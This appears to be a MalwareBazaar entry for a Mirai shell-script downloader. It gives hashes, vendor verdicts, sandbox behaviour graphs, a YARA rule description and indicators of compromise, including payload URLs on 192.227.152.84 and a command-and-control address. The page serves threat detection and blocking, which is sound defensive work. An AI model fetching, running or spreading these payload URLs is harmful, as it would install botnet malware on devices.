MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 8


Intelligence 8 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110
SHA3-384 hash: 4eb4b906504d576fb7fdaafac8373ab5c4066090e29ac3bf82bf2b15e4870203015bd6d6b2caa7290397f456628a4d02
SHA1 hash: c7ca388012b558f8f1a23517233ca071b1e6903c
MD5 hash: dc5a54f97befbcab9be127add089cf51
humanhash: lake-sink-football-fruit
File name:w
Download: download sample
Signature Mirai
Create hunting rule
File size:1'102 bytes
First seen:2025-12-25 07:40:25 UTC
Last seen:Never
File type: sh
MIME type:text/plain
ssdeep 24:efIdXIGDNIiIptKKIIo43lIrfIwv7jIv4s7gIsR0WJI0Kn4747In0:efIdXIG9IptRI8lIrfIwv7jIv4HIE0Wi
TLSH T14311F5FE9FA2613541D40A792A664439D80DADF43944CEECB48B0ABB7F84A14FD19B4C
Magika batch
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://192.227.152.84/sdxkzX_UXA229x.arm04ef8f7a8392a9d6521b94be31a8057f5ecc97760ef93fa11c5825a9309bb358 Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm5bf1dc3f056c16552095ff55778cd47895488d9fe00c37d6784f7aa552991357a Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm65e1843ee80b0a0f47fe7c102882aecaf626b2c2c671f80f217b8fb5558cf4456 Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.arm7f52ee4641fa9d67794922873d98e481346201ac5794340ce9082194bc373550a Miraiarm elf geofenced mirai ua-wget USA
http://192.227.152.84/sdxkzX_UXA229x.m68k176a51cc028c9a13f6776072813213c3580bcb758c15faf45b1e443ccf5bc9ea Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.mips070ab9396a2fa20b47cfb1741a65ae67f063cae74abfd0bfaff664aa102b7945 Miraielf geofenced mips mirai ua-wget USA
http://192.227.152.84/sdxkzX_UXA229x.ppc1b1df35f15ce9734c51a5ee94460400efafd1523b4b3baea89ddb0cf86c970dc Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.sh4c2c21ee47f5f90c68b992bedae3b57314257e435ebbd61febb09d35547b3ee99 Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.spc9b7970310c46c61a2aa1ff5dd3f16bdb742afdc7a3fc5e735d12b8a59223c767 Miraielf mirai ua-wget
http://192.227.152.84/sdxkzX_UXA229x.x865c3039368622c77ba28152085caf3d39531ae217eeb63a22d69c7e48715b2a2c Miraielf mirai ua-wget

Intelligence

File Origin
# of uploads :
1
# of downloads :
42
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
SecuriteInfo.com.Linux.Downloader-32.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox mirai
Link:
https://www.filescan.io/uploads/694ceed2a7163552ba04cba8/reports/8e95189d-b7c9-46f4-9076-b727c7c76c4a/overview
Verdict:
Malicious
Labled as:
Linux.Downloader.F.Generic
Link:
https://www.hybrid-analysis.com/sample/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110
Verdict:
Malicious
File Type:
text
First seen:
2025-12-25T04:48:00Z UTC
Last seen:
2025-12-25T04:54:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.cl
Link:
https://opentip.kaspersky.com/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/13d211a0-9602-45c4-9ad2-ee870957e049
Behavior Graph:
Download SVG
%3 guuid=73d1c4c8-1600-0000-375c-6ef6cb0c0000 pid=3275 /usr/bin/sudo guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281 /tmp/sample.bin guuid=73d1c4c8-1600-0000-375c-6ef6cb0c0000 pid=3275->guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281 execve guuid=2c8b75cc-1600-0000-375c-6ef6d20c0000 pid=3282 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=2c8b75cc-1600-0000-375c-6ef6d20c0000 pid=3282 execve guuid=a12af0e4-1600-0000-375c-6ef6050d0000 pid=3333 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=a12af0e4-1600-0000-375c-6ef6050d0000 pid=3333 execve guuid=53b82fe5-1600-0000-375c-6ef6070d0000 pid=3335 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=53b82fe5-1600-0000-375c-6ef6070d0000 pid=3335 clone guuid=c255f1e5-1600-0000-375c-6ef6090d0000 pid=3337 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=c255f1e5-1600-0000-375c-6ef6090d0000 pid=3337 execve guuid=3d70b8f7-1600-0000-375c-6ef63a0d0000 pid=3386 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=3d70b8f7-1600-0000-375c-6ef63a0d0000 pid=3386 execve guuid=4a8e0af8-1600-0000-375c-6ef63c0d0000 pid=3388 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=4a8e0af8-1600-0000-375c-6ef63c0d0000 pid=3388 clone guuid=e24abff8-1600-0000-375c-6ef6400d0000 pid=3392 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=e24abff8-1600-0000-375c-6ef6400d0000 pid=3392 execve guuid=867bc610-1700-0000-375c-6ef67b0d0000 pid=3451 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=867bc610-1700-0000-375c-6ef67b0d0000 pid=3451 execve guuid=082f1511-1700-0000-375c-6ef67d0d0000 pid=3453 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=082f1511-1700-0000-375c-6ef67d0d0000 pid=3453 clone guuid=58b70312-1700-0000-375c-6ef6800d0000 pid=3456 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=58b70312-1700-0000-375c-6ef6800d0000 pid=3456 execve guuid=64e14e30-1700-0000-375c-6ef6af0d0000 pid=3503 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=64e14e30-1700-0000-375c-6ef6af0d0000 pid=3503 execve guuid=f375cf30-1700-0000-375c-6ef6b00d0000 pid=3504 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=f375cf30-1700-0000-375c-6ef6b00d0000 pid=3504 clone guuid=ac13db31-1700-0000-375c-6ef6b20d0000 pid=3506 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=ac13db31-1700-0000-375c-6ef6b20d0000 pid=3506 execve guuid=f82cc249-1700-0000-375c-6ef6d50d0000 pid=3541 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=f82cc249-1700-0000-375c-6ef6d50d0000 pid=3541 execve guuid=96bc424a-1700-0000-375c-6ef6d70d0000 pid=3543 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=96bc424a-1700-0000-375c-6ef6d70d0000 pid=3543 clone guuid=81a53c4b-1700-0000-375c-6ef6db0d0000 pid=3547 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=81a53c4b-1700-0000-375c-6ef6db0d0000 pid=3547 execve guuid=5e944563-1700-0000-375c-6ef6330e0000 pid=3635 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=5e944563-1700-0000-375c-6ef6330e0000 pid=3635 execve guuid=75d07e63-1700-0000-375c-6ef6350e0000 pid=3637 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=75d07e63-1700-0000-375c-6ef6350e0000 pid=3637 clone guuid=2341f863-1700-0000-375c-6ef6390e0000 pid=3641 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=2341f863-1700-0000-375c-6ef6390e0000 pid=3641 execve guuid=7537d57c-1700-0000-375c-6ef6630e0000 pid=3683 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=7537d57c-1700-0000-375c-6ef6630e0000 pid=3683 execve guuid=98962c7d-1700-0000-375c-6ef6650e0000 pid=3685 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=98962c7d-1700-0000-375c-6ef6650e0000 pid=3685 clone guuid=53bf1a7e-1700-0000-375c-6ef6680e0000 pid=3688 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=53bf1a7e-1700-0000-375c-6ef6680e0000 pid=3688 execve guuid=370fd294-1700-0000-375c-6ef69d0e0000 pid=3741 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=370fd294-1700-0000-375c-6ef69d0e0000 pid=3741 execve guuid=3bf81e95-1700-0000-375c-6ef69f0e0000 pid=3743 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=3bf81e95-1700-0000-375c-6ef69f0e0000 pid=3743 clone guuid=b7cce595-1700-0000-375c-6ef6a40e0000 pid=3748 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=b7cce595-1700-0000-375c-6ef6a40e0000 pid=3748 execve guuid=85dd88ad-1700-0000-375c-6ef6df0e0000 pid=3807 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=85dd88ad-1700-0000-375c-6ef6df0e0000 pid=3807 execve guuid=d024eead-1700-0000-375c-6ef6e10e0000 pid=3809 /usr/bin/dash guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=d024eead-1700-0000-375c-6ef6e10e0000 pid=3809 clone guuid=39bca9ae-1700-0000-375c-6ef6e60e0000 pid=3814 /usr/bin/busybox net send-data write-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=39bca9ae-1700-0000-375c-6ef6e60e0000 pid=3814 execve guuid=66c072c6-1700-0000-375c-6ef62f0f0000 pid=3887 /usr/bin/chmod guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=66c072c6-1700-0000-375c-6ef62f0f0000 pid=3887 execve guuid=5cc2cdc6-1700-0000-375c-6ef6300f0000 pid=3888 /home/sandbox/sdxkzX_UXA229x.x86 delete-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=5cc2cdc6-1700-0000-375c-6ef6300f0000 pid=3888 execve guuid=b1c318c7-1700-0000-375c-6ef6330f0000 pid=3891 /usr/bin/rm delete-file guuid=a87826cc-1600-0000-375c-6ef6d10c0000 pid=3281->guuid=b1c318c7-1700-0000-375c-6ef6330f0000 pid=3891 execve 754c9895-f526-5c23-835d-e9aa002cfebe 192.227.152.84:80 guuid=2c8b75cc-1600-0000-375c-6ef6d20c0000 pid=3282->754c9895-f526-5c23-835d-e9aa002cfebe send: 95B guuid=c255f1e5-1600-0000-375c-6ef6090d0000 pid=3337->754c9895-f526-5c23-835d-e9aa002cfebe send: 96B guuid=e24abff8-1600-0000-375c-6ef6400d0000 pid=3392->754c9895-f526-5c23-835d-e9aa002cfebe send: 96B guuid=58b70312-1700-0000-375c-6ef6800d0000 pid=3456->754c9895-f526-5c23-835d-e9aa002cfebe send: 96B guuid=ac13db31-1700-0000-375c-6ef6b20d0000 pid=3506->754c9895-f526-5c23-835d-e9aa002cfebe send: 96B guuid=81a53c4b-1700-0000-375c-6ef6db0d0000 pid=3547->754c9895-f526-5c23-835d-e9aa002cfebe send: 96B guuid=2341f863-1700-0000-375c-6ef6390e0000 pid=3641->754c9895-f526-5c23-835d-e9aa002cfebe send: 95B guuid=53bf1a7e-1700-0000-375c-6ef6680e0000 pid=3688->754c9895-f526-5c23-835d-e9aa002cfebe send: 95B guuid=b7cce595-1700-0000-375c-6ef6a40e0000 pid=3748->754c9895-f526-5c23-835d-e9aa002cfebe send: 95B guuid=39bca9ae-1700-0000-375c-6ef6e60e0000 pid=3814->754c9895-f526-5c23-835d-e9aa002cfebe send: 95B guuid=d7acffc6-1700-0000-375c-6ef6310f0000 pid=3889 /home/sandbox/sdxkzX_UXA229x.x86 net send-data zombie guuid=5cc2cdc6-1700-0000-375c-6ef6300f0000 pid=3888->guuid=d7acffc6-1700-0000-375c-6ef6310f0000 pid=3889 clone 0c565469-e118-5e64-b250-02bc365c63ad 146.103.41.220:6669 guuid=d7acffc6-1700-0000-375c-6ef6310f0000 pid=3889->0c565469-e118-5e64-b250-02bc365c63ad send: 6B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=d7acffc6-1700-0000-375c-6ef6310f0000 pid=3889->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=0d6c15c7-1700-0000-375c-6ef6320f0000 pid=3890 /home/sandbox/sdxkzX_UXA229x.x86 guuid=d7acffc6-1700-0000-375c-6ef6310f0000 pid=3889->guuid=0d6c15c7-1700-0000-375c-6ef6320f0000 pid=3890 clone
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110/
Verdict:
Malicious
Threat:
Trojan-Downloader.Shell.Agent
Link:
https://tip.neiki.dev/file/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110
Threat name:
Linux.Downloader.Generic
Create hunting rule
Status:
Suspicious
First seen:
2025-12-24 13:49:43 UTC
File Type:
Text (Shell)
AV detection:
15 of 24 (62.50%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=rby7jrzzophtuxiygo7scqg6wfvsabbziadzp3ngdtzygxgwaeia._file
Result
Malware family:
n/a
Score:
  3/10
Tags:
n/a
Link:
https://tria.ge/reports/251225-jvlcqagm6x/
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.00
Link:
https://yomi.yoroi.company/submissions/8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

Mirai

sh 8871f4c73973cf3a5d1833bf2140deb16b200439400797eda61cf3835cd60110

(this sample)

Mirai

elf 03102d2c210a07eb67ac99d90a57eed7f87681fa49eea3f69d36812088968ca7

  
URLhaus
https://urlhaus.abuse.ch/url/3743074/
  
Delivery method
Distributed via web download
  
Dropping
MD5 929f8271895a193b93d5ac9c442591c7
  
Dropping
SHA256 03102d2c210a07eb67ac99d90a57eed7f87681fa49eea3f69d36812088968ca7

Comments